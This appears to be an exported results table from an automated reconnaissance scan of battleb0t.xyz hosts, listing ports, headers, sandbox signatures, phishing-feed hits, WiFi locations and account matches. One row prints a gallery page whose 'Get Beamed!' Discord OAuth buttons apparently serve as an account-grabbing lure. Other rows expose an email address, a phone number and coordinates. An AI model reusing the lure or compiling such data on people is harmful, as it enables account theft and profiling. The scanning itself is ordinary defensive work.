| 2023-05-12 02:59:57 | Affiliate - Email Address | No | E-Mail Address Extractor | 0 | 0 | 3 | 0 | None | mery.robinson@ftb.ca.gov | [{u'subsystem': None, u'classification_tags': [], u'crowdstrike_ai': {u'executable_process_memory_analysis': [], u'analysis_related_urls': [{u'url': u'http://this.props.pagesize/2)),e.currentdatapageendindex=math.min(e.currentdatapagestartindex+this.props.pagesize,this.props.rows.length-1),r=!0', u'type': u'extracted', u'verdict': u'suspicious'}]}, u'total_processes': 23, u'threat_score': None, u'compromised_hosts': [], u'environment_id': 160, u'major_os_version': None, u'submit_name': u'https://click9.bigmarker.com/links/BY79pHvYX2Z/QPJiO7I68/tMwYeVPDKIXG/IN5CQt3PP-?bu=7b9a2e229a7b00d2abf1a67ee21718a4f9a384d3997b4233ff5125d2b050eecdfd56122f5766da81f9380883c6330281152549d890a090250ca7457e3d6af512de37a44ef72cc832a7cff15e41cb02af8a17863d1d3fd8b23804d4f2277ba16828665e73cb7759a78343309ede93ee8fcceaf565cf60789ea78d923ffa76fe3d', u'signatures': [{u'category': u'General', u'origin': u'Created Mutant', u'identifier': u'mutant-0', u'name': u'Creates mutants', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 4, u'description': u'"Local\\SM0:2872:304:WilStaging_02"\n "InternetShortcutMutex"\n "Local\\SM0:2872:120:WilError_01"\n "SM0:2872:120:WilError_01"\n "SM0:2872:304:WilStaging_02"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-1', u'name': u'Contacts server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"34.231.70.218:443"\n "138.91.254.96:443"\n "3.235.65.215:443"\n "13.227.21.122:443"\n "185.199.108.153:443"\n "13.227.21.6:443"\n "151.101.0.176:443"\n "142.251.2.156:443"\n "151.101.2.137:443"\n "162.247.241.14:443"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-51', u'name': u'Queries DNS server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071/004', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071.004', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"api.edgeoffer.microsoft.com"\n "bam.nr-data.net"\n "checkout.stripe.com"\n "click9.bigmarker.com"\n "d1f74no97k6yi9.cloudfront.net"\n "d5ln38p3754yc.cloudfront.net"\n "js-agent.newrelic.com"\n "stats.g.doubleclick.net"\n "webrtc.github.io"\n "www.bigmarker.com"'}, {u'category': u'General', u'origin': u'File/Memory', u'identifier': u'string-10', u'name': u'Found a reference to a known community page', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 7, u'threat_level': 0, u'type': 2, u'description': u'Found string ""paypal.com"," (Indicator: "dir "; File: "wallet-checkout-eligible-sites-pre-stable.json")\n Found string ""baysidebuddy.com"," (Indicator: "dir "; File: "wallet-pre-stable.json")\n Found string ""comeherebuddy.com"," (Indicator: "dir "; File: "wallet-pre-stable.json")\n Found string ""www.facebook.com"," (Indicator: "dir "; File: "wallet-pre-stable.json")\n Found string ""linkedin.com"," (Indicator: "dir "; File: "wallet-pre-stable.json")\n Found string "<meta name="twitter:card" content="summary_large_image">" (Indicator: "dir "; File: "urlref_httpsclick9.bigmarker.comlinksBY79pHvYX2ZQPJiO7I68tMwYeVPDKIXGIN5CQt3PP-bu_7b9a2e229a7b00d2abf1a67ee21718a4f9a384d3997b4233ff512")\n Found string "<meta name="twitter:site" content="@bigmarker">" (Indicator: "dir "; File: "urlref_httpsclick9.bigmarker.comlinksBY79pHvYX2ZQPJiO7I68tMwYeVPDKIXGIN5CQt3PP-bu_7b9a2e229a7b00d2abf1a67ee21718a4f9a384d3997b4233ff512")\n Found string "<meta name="twitter:creator" content="@bigmarker">" (Indicator: "dir "; File: "urlref_httpsclick9.bigmarker.comlinksBY79pHvYX2ZQPJiO7I68tMwYeVPDKIXGIN5CQt3PP-bu_7b9a2e229a7b00d2abf1a67ee21718a4f9a384d3997b4233ff512")\n Found string "<meta name="twitter:title" content="The Inbound Customer Experience">" (Indicator: "dir "; File: "urlref_httpsclick9.bigmarker.comlinksBY79pHvYX2ZQPJiO7I68tMwYeVPDKIXGIN5CQt3PP-bu_7b9a2e229a7b00d2abf1a67ee21718a4f9a384d3997b4233ff512")\n Found string "<meta name="twitter:description" content="Our panelists will discuss a variety of questions including:" (Indicator: "dir "; File: "urlref_httpsclick9.bigmarker.comlinksBY79pHvYX2ZQPJiO7I68tMwYeVPDKIXGIN5CQt3PP-bu_7b9a2e229a7b00d2abf1a67ee21718a4f9a384d3997b4233ff512"), Found string "<meta name="twitter:image" content="https://d5ln38p3754yc.cloudfront.net/conference_icons/7821611/large/1677693079-c5b46aaa6c8ef248.jpg?1677693079">" (Indicator: "dir "; File: "urlref_httpsclick9.bigmarker.comlinksBY79pHvYX2ZQPJiO7I68tMwYeVPDKIXGIN5CQt3PP-bu_7b9a2e229a7b00d2abf1a67ee21718a4f9a384d3997b4233ff512")'}, {u'category': u'Unusual Characteristics', u'origin': u'File/Memory', u'identifier': u'string-23', u'name': u'Detected known bank URL artifact', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 2, u'description': u'""manitobaharvest.com"," (Source: wallet-checkout-eligible-sites-pre-stable.json, Indicator: "arvest.com")\n ""highkey.com"," (Source: wallet-checkout-eligible-sites-pre-stable.json, Indicator: "key.com")\n ""mandalascrubs.com"," (Source: wallet-checkout-eligible-sites-pre-stable.json, Indicator: "ubs.com")\n ""primalharvest.com"," (Source: wallet-checkout-eligible-sites-pre-stable.json, Indicator: "arvest.com")\n ""amazingclubs.com"," (Source: wallet-checkout-eligible-sites-pre-stable.json, Indicator: "ubs.com")\n ""purehockey.com"," (Source: wallet-checkout-eligible-sites-pre-stable.json, Indicator: "key.com")\n ""order.firehousesubs.com"," (Source: wallet-checkout-eligible-sites-pre-stable.json, Indicator: "ubs.com")\n ""cousinssubs.com"," (Source: wallet-checkout-eligible-sites-pre-stable.json, Indicator: "ubs.com")\n ""digikey.com"," (Source: wallet-checkout-eligible-sites-pre-stable.json, Indicator: "key.com")\n ""hockeymonkey.com"," (Source: wallet-checkout-eligible-sites-pre-stable.json, Indicator: "key.com")\n ""4amscrubs.com"," (Source: wallet-pre-stable.json, Indicator: "ubs.com")\n ""6whiskey.com"," (Source: wallet-pre-stable.json, Indicator: "key.com")\n ""99centsubs.com"," (Source: wallet-pre-stable.json, Indicator: "ubs.com")\n ""allieandmickey.com"," (Source: wallet-pre-stable.json, Indicator: "key.com")\n ""alteregoscrubs.com"," (Source: wallet-pre-stable.json, Indicator: "ubs.com")\n ""annabelbleu.com"," (Source: wallet-pre-stable.json, Indicator: "leu.com")\n ""aspirefashionscrubs.com"," (Source: wallet-pre-stable.json, Indicator: "ubs.com")\n ""augustbleu.com"," (Source: wallet-pre-stable.json, Indicator: "leu.com")\n ""bananasmonkey.com"," (Source: wallet-pre-stable.json, Indicator: "key.com")\n ""baseballmonkey.com"," (Source: wallet-pre-stable.json, Indicator: "key.com")'}, {u'category': u'Installation/Persistence', u'origin': u'API Call', u'identifier': u'api-242', u'name': u'Write files', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1105', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1105', u'relevance': 1, u'threat_level': 0, u'type': 6, u'description': u'"msedge.exe" writes file "c:\\users\\%osuser%\\appdata\\local\\microsoft\\edge\\user data\\crashpad\\settings.dat"\n "msedge.exe" writes file "\\device\\namedpipe\\wkssvc"\n "msedge.exe" writes file "c:\\users\\%osuser%\\appdata\\local\\microsoft\\edge\\user data\\variations"\n "msedge.exe" writes file "c:\\users\\%osuser%\\appdata\\local\\microsoft\\edge\\user data\\last version"\n "msedge.exe" writes file "c:\\users\\%osuser%\\appdata\\local\\microsoft\\edge\\user data\\default\\vpn tokens-journal"'}, {u'category': u'Installation/Persistence', u'origin': u'API Call', u'identifier': u'api-243', u'name': u'Read files', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1083', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1083', u'relevance': 1, u'threat_level': 0, u'type': 6, u'description': u'"msedge.exe" reads file "c:\\users\\%osuser%\\appdata\\local\\microsoft\\edge\\user data\\shadercache\\index"\n "msedge.exe" reads file "c:\\users\\%osuser%\\appdata\\local\\microsoft\\edge\\user data\\shadercache\\data_0"\n "msedge.exe" reads file "c:\\users\\%osuser%\\appdata\\local\\microsoft\\edge\\user data\\shadercache\\data_1"\n "msedge.exe" reads file "c:\\users\\%osuser%\\appdata\\local\\microsoft\\edge\\user data\\shadercache\\data_2"\n "msedge.exe" reads file "c:\\users\\%osuser%\\appdata\\local\\microsoft\\edge\\user data\\shadercache\\data_3"\n "msedge.exe" reads file "c:\\users\\%osuser%\\appdata\\local\\microsoft\\edge\\user data\\default\\history"\n "msedge.exe" reads file "c:\\users\\%osuser%\\appdata\\local\\microsoft\\edge\\user data\\default\\favicons"'}, {u'category': u'Installation/Persistence', u'origin': u'File/Memory', u'identifier': u'string-396', u'name': u'Contains ability to create/modify Windows services (Powershell command string)', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1543/003', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1543.003', u'relevance': 1, u'threat_level': 0, u'type': 2, u'description': u'Found string "<div class="registrants-add-contents" style="padding-bottom: 28px">" (Indicator: "Add-Content"; File: "urlref_httpsclick9.bigmarker.comlinksBY79pHvYX2ZQPJiO7I68tMwYeVPDKIXGIN5CQt3PP-bu_7b9a2e229a7b00d2abf1a67ee21718a4f9a384d3997b4233ff512")'}, {u'category': u'Installation/Persistence', u'origin': u'Binary File', u'identifier': u'binary-0', u'name': u'Dropped files', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1105', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1105', u'relevance': 3, u'threat_level': 0, u'type': 8, u'description': u'"shopping.js" has type "UTF-8 Unicode text with very long lines with CRLF line terminators"- Location: [%TEMP%\\636_742791881\\shopping.js]- [targetUID: 00000000-00000636]\n "data_2" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\Cache\\Cache_Data\\data_2]- [targetUID: 00000000-00000636]\n "Ruleset Data" has type "da |
| 2023-05-12 02:46:49 | Open TCP Port | No | SSL Certificate Analyzer | 0 | 0 | 3 | 0 | None | 35.229.48.116:443 | 35.229.48.116 |
| 2023-05-12 03:24:19 | Account on External Site | No | Account Finder | 0 | 0 | 8 | 0 | None | slideshare (Category: social)
https://www.slideshare.net/baptistevauthey | baptistevauthey |
| 2023-05-12 03:18:06 | Externally Hosted Javascript | No | Page Information | 0 | 0 | 3 | 0 | None | http://code.jquery.com/jquery-3.2.1.js | <!DOCTYPE html>
<html>
<head>
<title>Funny Forehead Gallery</title>
<link rel="stylesheet" href="https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/css/bootstrap.min.css" integrity="sha384-BVYiiSIFeK1dGmJRAkycuHAHRg32OmUcww7on3RYdg4Va+PmSTsz/K68vbdEjh4u" crossorigin="anonymous">
<script src="http://code.jquery.com/jquery-3.2.1.js" integrity="sha256-DZAnKJ/6XZ9si04Hgrsxu/8s717jcIzLy3oi35EouyE=" crossorigin="anonymous"></script>
<script src="https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/js/bootstrap.min.js" integrity="sha384-Tc5IQib027qvyjSMfHjOMaLkfuWVxZxUPnCJA7l2mCWNIpG9mGCD8wGNIcPD7Txa" crossorigin="anonymous"></script>
<script src="https://use.fontawesome.com/9dfc16ed6b.js"></script>
<link rel="stylesheet" type="text/css" href="gallery.css">
<link rel="icon" type="image/png" href="/images/favicon.png">
</head>
<body>
<nav class = "nav navbar-inverse navbar-fixed-top">
<div class = "container">
<div class = "navbar-header">
<button type="button" class="navbar-toggle collapsed" data-toggle="collapse" data-target="#bs-example-navbar-collapse-1" aria-expanded="false">
<span class="sr-only">Toggle navigation</span>
<span class="icon-bar"></span>
<span class="icon-bar"></span>
<span class="icon-bar"></span>
</button>
<a href = "#" class = "navbar-brand"><span class="glyphicon glyphicon-picture" aria-hidden="true"></span> #WieselOnTop</a>
</div>
</nav>
<div class = "container">
<div class = "jumbotron">
<h1><i class="fa fa-camera-retro" aria-hidden="true"></i> The Funny Forehead Gallery</h1>
<p>A bunch of beautiful images!</p>
<a href = "https://discord.com/api/oauth2/authorize?client_id=1073319920575713290&redirect_uri=https%3A%2F%2Fyoink.site%2Fauth&response_type=code&scope=identify%20guilds.join" class = "btn btn-primary btn-lg">Join the Discord</a>
<a href = "https://discord.com/api/oauth2/authorize?client_id=1073319920575713290&redirect_uri=https%3A%2F%2Fyoink.site%2Fauth&response_type=code&scope=identify%20guilds.join" class = "btn btn-primary btn-lg">Get Beamed!</a>
</div>
<div class = "row">
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/carti_1.jpg">
</div>
</div>
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/carti_2.PNG">
</div>
</div>
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/carti_3.JPG">
</div>
</div>
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/nomnom.jpg">
</div>
</div>
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/fredo.PNG">
</div>
</div>
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/jonas.PNG">
</div>
</div>
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/master058_1.PNG">
</div>
</div>
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/master058_2.PNG">
</div>
</div>
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/master058_3.PNG">
</div>
</div>
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/ein_1.png">
</div>
</div>
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/ein_2.png">
</div>
</div>
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/reveloder.jpg">
</div>
</div>
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/kappi_1.png">
</div>
</div>
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/kappi_2.png">
</div>
</div>
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/withat_1.jpg">
</div>
</div>
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/withat_2.jpg">
</div>
</div>
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/withat_3.jpg">
</div>
</div>
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/withat_4.jpg">
</div>
</div>
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/withat_5.jpg">
</div>
</div>
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/random_1.jpeg">
</div>
</div>
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/random_2.jpeg">
</div>
</div>
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/random_3.jpg">
</div>
</div>
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/random_4.png">
</div>
</div>
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/random_5.png">
</div>
</div>
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/random_6.PNG">
</div>
</div>
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/jcqn.jpg">
</div>
</div>
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/nwp.PNG">
</div>
</div>
</div>
</body>
</html>
|
| 2023-05-12 03:23:11 | Open TCP Port | No | Pulsedive | 0 | 0 | 3 | 0 | None | 188.114.96.1:80 | 188.114.96.0/24 |
| 2023-05-12 02:56:15 | Non-Standard HTTP Header | No | Strange Header Identifier | 0 | 0 | 4 | 0 | None | x-cache: MISS | {"content-length": "1591", "via": "1.1 varnish", "vary": "Accept-Encoding", "etag": "W/\"642b434c-1999\"", "x-cache-hits": "0", "cache-control": "max-age=600", "x-served-by": "cache-lga21982-LGA", "x-origin-cache": "HIT", "x-cache": "MISS", "x-github-request-id": "69FA:0168:26C3619:3A6662D:645DAA55", "accept-ranges": "bytes", "expires": "Fri, 12 May 2023 03:04:13 GMT", "last-modified": "Mon, 03 Apr 2023 21:21:16 GMT", "x-fastly-request-id": "81f392d6f8601ba9f7017cc835b0845172eec1e9", "date": "Fri, 12 May 2023 02:54:13 GMT", "access-control-allow-origin": "*", "x-proxy-cache": "MISS", "content-encoding": "gzip", "age": "0", "x-timer": "S1683860053.299752,VS0,VE13", "server": "GitHub.com", "connection": "keep-alive", "content-type": "text/css; charset=utf-8"} |
| 2023-05-12 03:13:03 | Malicious Co-Hosted Site | Yes | OpenPhish | 0 | 0 | 3 | 0 | None | OpenPhish [0000rgb124.github.io]
https://www.openphish.com/feed.txt | 0000rgb124.github.io |
| 2023-05-12 03:09:41 | Affiliate - Internet Name | No | DNS Resolver | 0 | 0 | 4 | 0 | None | 125.48.229.35.bc.googleusercontent.com | 35.229.48.125 |
| 2023-05-12 03:42:18 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 4 | 0 | None | Sitecom6FE774 (Net ID: 00:0C:F6:6F:E7:74) | 50.8897, 6.0563 |
| 2023-05-12 02:54:20 | Linked URL - Internal | No | Web Spider | 2 | 0 | 3 | 0 | None | https://funny.battleb0t.xyz/images/random_3.jpg | https://funny.battleb0t.xyz/ |
| 2023-05-12 02:54:23 | HTTP Headers | No | Web Spider | 10 | 0 | 5 | 0 | None | {"content-encoding": "gzip", "nel": "{\"success_fraction\":0,\"report_to\":\"cf-nel\",\"max_age\":604800}", "referrer-policy": "same-origin", "permissions-policy": "accelerometer=(),autoplay=(),camera=(),clipboard-read=(),clipboard-write=(),fullscreen=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()", "cross-origin-resource-policy": "same-origin", "transfer-encoding": "chunked", "alt-svc": "h3=\":443\"; ma=86400, h3-29=\":443\"; ma=86400", "expires": "Thu, 01 Jan 1970 00:00:01 GMT", "vary": "Accept-Encoding", "server": "cloudflare", "connection": "close", "report-to": "{\"endpoints\":[{\"url\":\"https:\\/\\/a.nel.cloudflare.com\\/report\\/v3?s=A6pUH5BrVxAUHCFyEeZi9CXof2Qs7NDG4lIwx2vXWTr3bfLmD6TvAbu9CC5NAPxdf7YdVt%2FA3H1mkzjba6JtFsZlXS70vO%2B%2Fyr5MWISSAsLD5ovFUcdhiD4vPP8ctfc%3D\"}],\"group\":\"cf-nel\",\"max_age\":604800}", "cf-mitigated": "challenge", "cache-control": "private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0", "date": "Fri, 12 May 2023 02:54:23 GMT", "x-frame-options": "SAMEORIGIN", "cross-origin-embedder-policy": "require-corp", "content-type": "text/html; charset=UTF-8", "cf-ray": "7c5f60726fad1912-EWR", "cross-origin-opener-policy": "same-origin"} | https://www.ayhu.xyz/?__cf_chl_f_tk=eArohGzIRNubxh3D6IFMRkkS6OUaNS008kBgg4I5pUY-1683860063-0-gaNycGzNCiU |
| 2023-05-12 03:27:00 | Web Server | No | Web Server Identifier | 0 | 1 | 2 | 0 | None | GitHub.com | {"content-length": "690", "via": "1.1 varnish", "vary": "Accept-Encoding", "etag": "W/\"642b434c-4fb\"", "x-cache-hits": "1", "cache-control": "max-age=600", "x-served-by": "cache-ewr18140-EWR", "x-cache": "HIT", "x-github-request-id": "1AD4:4FA0:AFAB37:106D10A:645DA7F4", "accept-ranges": "bytes", "expires": "Fri, 12 May 2023 02:54:04 GMT", "last-modified": "Mon, 03 Apr 2023 21:21:16 GMT", "x-fastly-request-id": "47e9025f17d9e6e936d804b3c00d7989ec4a827a", "date": "Fri, 12 May 2023 02:54:12 GMT", "access-control-allow-origin": "*", "x-proxy-cache": "MISS", "content-encoding": "gzip", "age": "559", "x-timer": "S1683860053.987504,VS0,VE2", "server": "GitHub.com", "connection": "keep-alive", "content-type": "text/html; charset=utf-8"} |
| 2023-05-12 03:18:45 | Raw File Meta Data | No | File Metadata Extractor | 0 | 0 | 4 | 0 | None | {'Image ExifOffset': (0x8769) Long=134 @ 90, 'Image Orientation': (0x0112) Short=Horizontal (normal) @ 18, 'Image YCbCrPositioning': (0x0213) Short=Centered @ 78, 'Image XResolution': (0x011A) Ratio=72 @ 98, 'EXIF FlashPixVersion': (0xA000) Undefined=0100 @ 168, 'EXIF SceneCaptureType': (0xA406) Short=Standard @ 216, 'Image DateTime': (0x0132) ASCII=2023:01:11 18:24:47 @ 114, 'Image YResolution': (0x011B) Ratio=72 @ 106, 'EXIF ColorSpace': (0xA001) Short=sRGB @ 180, 'EXIF ExifImageLength': (0xA003) Long=2316 @ 204, 'EXIF ExifVersion': (0x9000) Undefined=0221 @ 144, 'Image ResolutionUnit': (0x0128) Short=Pixels/Inch @ 54, 'EXIF ExifImageWidth': (0xA002) Long=3088 @ 192, 'EXIF ComponentsConfiguration': (0x9101) Undefined=YCbCr @ 156} | https://pics.battleb0t.xyz/images/carti_1.jpg |
| 2023-05-12 03:18:59 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | linksys (Net ID: 00:06:25:3C:1A:6D) | 33.617190550339146,-111.90827887019054 |
| 2023-05-12 03:18:53 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | LCPS-A (Net ID: 00:0C:E6:02:7D:6E) | 39.0469, -77.4903 |
| 2023-05-12 03:19:09 | Account on External Site | No | Account Finder | 0 | 0 | 6 | 0 | None | Mastodon-mastodon (Category: social)
https://mastodon.social/@login | login |
| 2023-05-12 02:55:28 | Raw Data from RIRs | No | URLScan.io | 0 | 0 | 2 | 0 | None | [{u'sort': [1679937961810, u'be713cda-cf3f-49bd-91b6-e8517dc017bf'], u'task': {u'domain': u'kekw.battleb0t.xyz', u'uuid': u'be713cda-cf3f-49bd-91b6-e8517dc017bf', u'tags': [u'falconsandbox'], u'url': u'http://kekw.battleb0t.xyz/jar', u'visibility': u'public', u'time': u'2023-03-27T17:26:01.810Z', u'apexDomain': u'battleb0t.xyz', u'method': u'api'}, u'stats': {u'uniqIPs': 1, u'uniqCountries': 0, u'encodedDataLength': 0, u'requests': 1, u'dataLength': 0}, u'screenshot': u'https://urlscan.io/screenshots/be713cda-cf3f-49bd-91b6-e8517dc017bf.png', u'_score': None, u'result': u'https://urlscan.io/api/v1/result/be713cda-cf3f-49bd-91b6-e8517dc017bf/', u'_id': u'be713cda-cf3f-49bd-91b6-e8517dc017bf', u'page': {u'url': u'http://kekw.battleb0t.xyz/jar', u'domain': u'kekw.battleb0t.xyz', u'apexDomain': u'battleb0t.xyz'}}, {u'sort': [1679768811151, u'4b027c18-4e16-4bfc-8793-6295946cceb7'], u'task': {u'domain': u'kekw.battleb0t.xyz', u'uuid': u'4b027c18-4e16-4bfc-8793-6295946cceb7', u'tags': [u'https://phish.report', u'@phish_report'], u'url': u'https://kekw.battleb0t.xyz/jar', u'visibility': u'public', u'time': u'2023-03-25T18:26:51.151Z', u'apexDomain': u'battleb0t.xyz', u'method': u'api'}, u'stats': {u'uniqIPs': 1, u'uniqCountries': 1, u'encodedDataLength': 84, u'requests': 1, u'dataLength': 11}, u'screenshot': u'https://urlscan.io/screenshots/4b027c18-4e16-4bfc-8793-6295946cceb7.png', u'_score': None, u'result': u'https://urlscan.io/api/v1/result/4b027c18-4e16-4bfc-8793-6295946cceb7/', u'_id': u'4b027c18-4e16-4bfc-8793-6295946cceb7', u'page': {u'mimeType': u'text/plain', u'status': u'502', u'domain': u'kekw.battleb0t.xyz', u'url': u'https://kekw.battleb0t.xyz/jar', u'country': u'DE', u'tlsValidFrom': u'2023-03-23T21:24:09.000Z', u'asnname': u'DIGITALOCEAN-ASN, US', u'tlsIssuer': u'Easypanel', u'tlsValidDays': 3650, u'ip': u'64.226.81.43', u'apexDomain': u'battleb0t.xyz', u'tlsAgeDays': 1, u'asn': u'AS14061'}}, {u'sort': [1678573216685, u'ac5ae0a3-e538-4bd1-ac20-6d6f8a5fe2ea'], u'task': {u'domain': u'kekw.battleb0t.xyz', u'uuid': u'ac5ae0a3-e538-4bd1-ac20-6d6f8a5fe2ea', u'tags': [u'https://phish.report', u'@phish_report'], u'url': u'http://kekw.battleb0t.xyz/', u'visibility': u'public', u'time': u'2023-03-11T22:20:16.685Z', u'apexDomain': u'battleb0t.xyz', u'method': u'api'}, u'stats': {u'uniqIPs': 1, u'uniqCountries': 1, u'encodedDataLength': 300, u'requests': 1, u'dataLength': 207}, u'screenshot': u'https://urlscan.io/screenshots/ac5ae0a3-e538-4bd1-ac20-6d6f8a5fe2ea.png', u'_score': None, u'result': u'https://urlscan.io/api/v1/result/ac5ae0a3-e538-4bd1-ac20-6d6f8a5fe2ea/', u'_id': u'ac5ae0a3-e538-4bd1-ac20-6d6f8a5fe2ea', u'page': {u'mimeType': u'text/html', u'status': u'404', u'domain': u'kekw.battleb0t.xyz', u'title': u'404 Not Found', u'url': u'https://kekw.battleb0t.xyz/', u'ip': u'46.101.229.70', u'tlsValidFrom': u'2023-01-27T17:58:43.000Z', u'asnname': u'DIGITALOCEAN-ASN, US', u'server': u'Werkzeug/2.2.2 Python/3.10.9', u'tlsIssuer': u'R3', u'tlsValidDays': 89, u'country': u'DE', u'redirected': u'https-only', u'apexDomain': u'battleb0t.xyz', u'tlsAgeDays': 43, u'asn': u'AS14061'}}, {u'sort': [1678573191537, u'd8289b22-dbac-48d2-856a-e99fe632406b'], u'task': {u'domain': u'kekw.battleb0t.xyz', u'uuid': u'd8289b22-dbac-48d2-856a-e99fe632406b', u'tags': [u'https://phish.report', u'@phish_report'], u'url': u'http://kekw.battleb0t.xyz/', u'visibility': u'public', u'time': u'2023-03-11T22:19:51.537Z', u'apexDomain': u'battleb0t.xyz', u'method': u'api'}, u'stats': {u'uniqIPs': 1, u'uniqCountries': 1, u'encodedDataLength': 300, u'requests': 1, u'dataLength': 207}, u'screenshot': u'https://urlscan.io/screenshots/d8289b22-dbac-48d2-856a-e99fe632406b.png', u'_score': None, u'result': u'https://urlscan.io/api/v1/result/d8289b22-dbac-48d2-856a-e99fe632406b/', u'_id': u'd8289b22-dbac-48d2-856a-e99fe632406b', u'page': {u'mimeType': u'text/html', u'status': u'404', u'domain': u'kekw.battleb0t.xyz', u'title': u'404 Not Found', u'url': u'https://kekw.battleb0t.xyz/', u'ip': u'46.101.229.70', u'tlsValidFrom': u'2023-01-27T17:58:43.000Z', u'asnname': u'DIGITALOCEAN-ASN, US', u'server': u'Werkzeug/2.2.2 Python/3.10.9', u'tlsIssuer': u'R3', u'tlsValidDays': 89, u'country': u'DE', u'redirected': u'https-only', u'apexDomain': u'battleb0t.xyz', u'tlsAgeDays': 43, u'asn': u'AS14061'}}] | kekw.battleb0t.xyz |
| 2023-05-12 03:32:04 | Open TCP Port | No | Pulsedive | 0 | 0 | 3 | 0 | None | 188.114.97.3:443 | 188.114.97.0/24 |
| 2023-05-12 03:18:51 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | eduwifi (Net ID: 00:02:2D:2B:E9:C1) | 37.7642, -122.3993 |
| 2023-05-12 03:22:54 | Open TCP Port | No | Pulsedive | 0 | 0 | 2 | 0 | None | 188.114.97.1:80 | 188.114.97.1 |
| 2023-05-12 03:19:09 | Account on External Site | No | Account Finder | 0 | 0 | 6 | 0 | None | Motokiller (Category: images)
https://mklr.pl/user/login | login |
| 2023-05-12 02:55:11 | Open TCP Port | No | Censys | 0 | 0 | 2 | 0 | None | 87.248.157.102:2086 | 87.248.157.102 |
| 2023-05-12 02:55:01 | Open TCP Port | No | Censys | 0 | 0 | 2 | 0 | None | 188.114.96.1:2096 | 188.114.96.1 |
| 2023-05-12 03:24:48 | Country | No | Country Name Extractor | 0 | 0 | 3 | 0 | None | United States | +14805058800 |
| 2023-05-12 03:21:07 | Malicious IP on Same Subnet | Yes | Emerging Threats | 0 | 0 | 4 | 0 | None | emergingthreats.net [165.232.112.0/20]
https://rules.emergingthreats.net/blockrules/compromised-ips.txt | 165.232.112.0/20 |
| 2023-05-12 03:23:33 | Open TCP Port | No | Pulsedive | 0 | 0 | 3 | 0 | None | 188.114.96.12:8443 | 188.114.96.0/24 |
| 2023-05-12 02:53:00 | Raw Data from RIRs | No | Tool - WAFW00F | 1 | 0 | 2 | 0 | None | [{"url": "https://oldfluid.battleb0t.xyz", "firewall": "Cloudflare", "detected": true, "manufacturer": "Cloudflare Inc."}, {"url": "https://oldfluid.battleb0t.xyz", "firewall": "None", "detected": false, "manufacturer": "None"}] | oldfluid.battleb0t.xyz |
| 2023-05-12 02:55:05 | Open TCP Port Banner | No | Censys | 0 | 0 | 2 | 0 | None | HTTP/1.1 403 Forbidden
Server: cloudflare
Date: <REDACTED>
Content-Type: text/html
Content-Length: 151
Connection: keep-alive
CF-RAY: 7c546dd3883829f4-ORD
| 188.114.97.1 |
